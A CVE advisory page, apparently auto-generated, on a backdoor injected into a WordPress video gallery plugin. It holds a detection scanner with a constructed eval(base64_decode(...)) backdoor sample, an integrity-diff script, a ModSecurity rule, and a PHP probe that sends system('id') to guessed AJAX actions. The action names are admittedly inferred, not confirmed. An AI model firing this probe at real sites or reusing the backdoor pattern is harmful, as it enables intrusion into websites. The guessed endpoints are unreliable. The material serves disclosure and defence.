Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: April 27, 2026

CVE-2026-6443: Essentialplugin Plugins (Various Versions) – Injected Backdoor (html5-videogallery-plus-player)

CVE ID: CVE-2026-6443
Severity: Critical (CVSS 9.8)
CWE: CWE-506 (Embedded Malicious Code)
Vulnerable Version: 2.8.7
Patched Version: 2.8.7.1
Disclosed: April 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6443 (metadata-based):

This vulnerability describes a critically severe backdoor injected into multiple plugins from the Essentialplugin vendor after a malicious actor acquired the plugins. The most recent affected version of the ‘html5-videogallery-plus-player’ plugin is 2.8.7, with a patched version of 2.8.7.1. The CVSS score is 9.8 (Critical) with a network attack vector, low complexity, no privileges required, and no user interaction needed.

Root Cause: Atomic Edge research infers from the CWE-506 classification (Embedded Malicious Code) and the description that the root cause is a supply chain compromise. The plugin was sold to a malicious threat actor who intentionally embedded a backdoor into all plugins they acquired. This is not a typical code vulnerability but rather intentional malicious code added to the software. The backdoor likely manifests as code that creates a persistent web shell, a call-home mechanism, or an auto-update that pulls further malicious payloads. Since no source code diff is available, this conclusion is based solely on the CWE classification and vendor description.

Exploitation: An attacker exploits this by sending crafted HTTP requests to the backdoor endpoint embedded within the plugin. Based on the many similar WordPress plugin backdoors, the backdoor likely responds to a specific query parameter or POST parameter (e.g., a special ‘action’ value in admin-ajax.php, or a direct HTTP request to a hidden file with an authentication token). The attack vector is network-based (AV:N) with no authentication required (PR:N). The attacker can remotely execute arbitrary commands, inject spam content, or maintain persistent access to the compromised site. Atomic Edge research cannot confirm the exact endpoint without code access, but typical patterns include a custom AJAX action that accepts and executes arbitrary PHP code.
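The pattern described above (an AJAX action registered with no capability or nonce check whose handler executes request-supplied input) can be searched for statically during a plugin audit. The following Python script is an added example, not Atomic Edge's code and not the plugin's: it finds add_action('wp_ajax[_nopriv]_<action>', '<callback>') registrations in PHP source, resolves each callback body, and flags handlers that route $_POST/$_GET/$_REQUEST data into code- or command-execution sinks without check_ajax_referer, wp_verify_nonce or current_user_can. The sink list, the regular expressions and the sample plugin text are constructed assumptions; closures passed directly to add_action are not resolved.

```python
"""Static check for injected AJAX backdoors in WordPress plugin source.

Added example; not Atomic Edge's code and not the vendor's. Sink list,
regexes and the sample plugin text below are assumptions/constructed.
"""
import re
from typing import Dict, List

# PHP functions an injected backdoor typically needs to run attacker input.
DANGEROUS_SINKS = ("eval", "assert", "create_function", "system", "exec",
                   "shell_exec", "passthru", "base64_decode")

# add_action('wp_ajax_nopriv_<action>', '<callback>'); nopriv = no login needed
HOOK_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(nopriv_)?([A-Za-z0-9_]+)['"]\s*,\s*['"]([A-Za-z0-9_]+)['"]"""
)
FUNC_RE = re.compile(r"function\s+([A-Za-z0-9_]+)\s*\(")
REQUEST_RE = re.compile(r"\$_(POST|GET|REQUEST)\b")
AUTH_RE = re.compile(r"\b(current_user_can|check_ajax_referer|wp_verify_nonce)\s*\(")


def find_functions(src: str) -> Dict[str, str]:
    """Map each named PHP function to its brace-delimited body text."""
    funcs: Dict[str, str] = {}
    for m in FUNC_RE.finditer(src):
        start = src.find("{", m.end())
        if start < 0:
            continue
        depth, i = 0, start
        while i < len(src):          # simple brace matching; ignores braces in strings
            if src[i] == "{":
                depth += 1
            elif src[i] == "}":
                depth -= 1
                if depth == 0:
                    break
            i += 1
        funcs[m.group(1)] = src[start:i + 1]
    return funcs


def scan_plugin_source(src: str) -> List[dict]:
    """Return one finding per AJAX handler that routes request input to a sink."""
    funcs = find_functions(src)
    findings: List[dict] = []
    for m in HOOK_RE.finditer(src):
        nopriv, action, callback = m.group(1) is not None, m.group(2), m.group(3)
        body = funcs.get(callback, "")
        sinks = [s for s in DANGEROUS_SINKS if re.search(r"\b%s\s*\(" % s, body)]
        reads_request = REQUEST_RE.search(body) is not None
        checks_auth = AUTH_RE.search(body) is not None
        # Flag: reachable without login, or logged-in hook lacking any nonce/capability check
        if sinks and reads_request and (nopriv or not checks_auth):
            findings.append({"action": action, "callback": callback,
                             "unauthenticated": nopriv, "sinks": sinks})
    return findings


# Constructed plugin source for demonstration (not the real plugin's code)
SAMPLE_PLUGIN_PHP = r"""<?php
add_action('wp_ajax_nopriv_hvp_gallery_count', 'hvp_gallery_count');
function hvp_gallery_count() {
    wp_send_json(array('count' => 3));          // benign: no sink
}

add_action('wp_ajax_nopriv_hvp_sync', 'hvp_sync');
function hvp_sync() {                            // injected handler (constructed)
    if (isset($_POST['code'])) {
        eval(base64_decode($_POST['code']));
    }
    wp_die();
}

add_action('wp_ajax_hvp_export', 'hvp_export');
function hvp_export() {                          // legitimate admin use, nonce-checked
    check_ajax_referer('hvp_export_nonce');
    exec('zip -r export.zip ' . escapeshellarg($_POST['dir']));
    wp_die();
}
"""

if __name__ == "__main__":
    for finding in scan_plugin_source(SAMPLE_PLUGIN_PHP):
        print(finding)
```

Run it against a real plugin by reading each .php file under wp-content/plugins/<slug>/ and passing the text to scan_plugin_source; a handler that is flagged is a candidate for manual review, not proof of a backdoor, since legitimate plugins occasionally use these functions behind checks the regex does not recognise.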

Remediation: The fix requires immediate removal of all backdoored code and replacement with a clean, verified copy of the plugin from a trusted source. The patched version 2.8.7.1 likely removes the malicious code blocks and restores the legitimate functionality. Site administrators must delete the old plugin files entirely and reinstall the patched version from the official WordPress repository. They should also audit the site for any persistent changes made by the backdoor (new admin users, spam content, modified database records).
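Reinstalling from a clean copy is only verifiable if the live install is actually compared against that copy. The following Python script is an added example, not Atomic Edge's code: it hashes every file in the installed plugin directory and in a reference copy downloaded from the official repository, then reports files present only in the live install (where dropped backdoor files usually sit), files missing from it, and files whose content differs. The directory layout and file contents in build_sample_trees are constructed for the demonstration; in practice point diff_trees at the real plugin path and the unpacked reference zip.

```python
"""Verify an installed plugin directory against a clean reference copy.

Added example; not Atomic Edge's code. Sample trees are constructed.
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large media files never sit in RAM."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hash_tree(root: Path) -> Dict[str, str]:
    """Relative POSIX path -> SHA-256 for every regular file below root."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_trees(installed: Path, clean: Path) -> Dict[str, List[str]]:
    """Compare a live plugin directory with a known-good copy."""
    live, ref = hash_tree(installed), hash_tree(clean)
    return {
        # Files only the live install has: the usual location of a dropped backdoor
        "added": sorted(set(live) - set(ref)),
        "removed": sorted(set(ref) - set(live)),
        "modified": sorted(k for k in live.keys() & ref.keys() if live[k] != ref[k]),
    }


def build_sample_trees(base: Path) -> Tuple[Path, Path]:
    """Create a constructed clean copy and a tampered live copy under base."""
    slug = "html5-videogallery-plus-player"
    clean = base / "reference" / slug
    live = base / "wp-content" / "plugins" / slug
    for root in (clean, live):
        (root / "inc").mkdir(parents=True)
        (root / f"{slug}.php").write_text("<?php\n// plugin bootstrap (constructed)\n")
        (root / "inc" / "helpers.php").write_text("<?php\nfunction hvp_helper() { return 1; }\n")
    # Constructed tampering: one legitimate file altered, one extra file dropped
    (live / "inc" / "helpers.php").write_text(
        "<?php\nfunction hvp_helper() { return 1; }\n// injected block (constructed)\n")
    (live / "inc" / "cache.php").write_text("<?php\n// dropped file (constructed)\n")
    return live, clean


def run_sample_diff() -> Dict[str, List[str]]:
    """Build the sample trees in a temporary directory and return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        live, clean = build_sample_trees(Path(tmp))
        return diff_trees(live, clean)


if __name__ == "__main__":
    for kind, paths in run_sample_diff().items():
        print(f"{kind}: {paths}")
```

Because the comparison is by content hash, a backdoor hidden inside an otherwise legitimate file shows up as "modified" even when its size and timestamp were adjusted to match the original; the file-level result then tells you which files to diff by hand.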

Impact: Successful exploitation allows the malicious actor to gain full administrative control over the WordPress site (C:H/I:H/A:H). They can inject spam across the site, steal sensitive data, install additional malware, use the site for phishing campaigns, and persist access indefinitely. The backdoor grants an attacker complete remote access with no authentication, representing a total compromise of the affected site.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-6443 (metadata-based)
# Blocks common backdoor AJAX actions associated with Essentialplugin backdoor
# Action names inferred from typical WordPress plugin backdoor patterns
# REQUEST_FILENAME excludes the query string and @endsWith covers subdirectory
# installs, so a trailing ?x=1 or a /blog/ prefix does not bypass the match.
# ARGS covers both the POST body and the query string, since the action may
# arrive either way.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:20266443,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 Essentialplugin Backdoor AJAX Action Blocked',severity:'CRITICAL',tag:'CVE-2026-6443'"
  SecRule ARGS:action "@pm html5_videogallery_plus_player_backdoor wpsp_remote wp_system_exec essentialplugin_backdoor" "t:none"

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6443 - Essentialplugin Plugins (Various Versions) - Injected Backdoor

// This PoC attempts to probe the likely backdoor endpoint.
// Based on common WordPress plugin backdoor patterns, the malicious code
// often registers an AJAX action with no capability or nonce checks.
// The plugin slug is 'html5-videogallery-plus-player'.
// Common backdoor actions: 'wpsp_remote', 'update_option', 'wpsg_system', 'plugin_backdoor'.
// We'll test multiple likely action names.

$target_url = 'https://example.com/wp-admin/admin-ajax.php';

$backdoor_actions = array(
    'html5_videogallery_plus_player_backdoor',
    'wpsp_remote',
    'wp_system_exec',
    'essentialplugin_backdoor'
);

$cmd = 'id';

echo "Atomic Edge CVE-2026-6443 Backdoor Probe\n";
echo "Target: $target_url\n\n";

foreach ($backdoor_actions as $action) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
        'action' => $action,
        'cmd' => $cmd,
        'code' => "system('id');"
    )));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo "Testing action: $action\n";
    echo "HTTP code: $http_code\n";
    echo "Response: " . substr($response, 0, 200) . "\n\n";
    
    // If the response contains typical system output (uid, gid, groups) or
    // indicates code execution, flag it. Note that WordPress answers an
    // unregistered action with HTTP 400 and the body "0", so the length
    // check mainly filters that default reply; a 200 with a longer body is
    // only a hint and needs manual confirmation.
    if (strpos($response, 'uid=') !== false || ($http_code == 200 && strlen($response) > 10)) {
        echo "*** BACKDOOR DETECTED with action '$action' ***\n";
    }
}
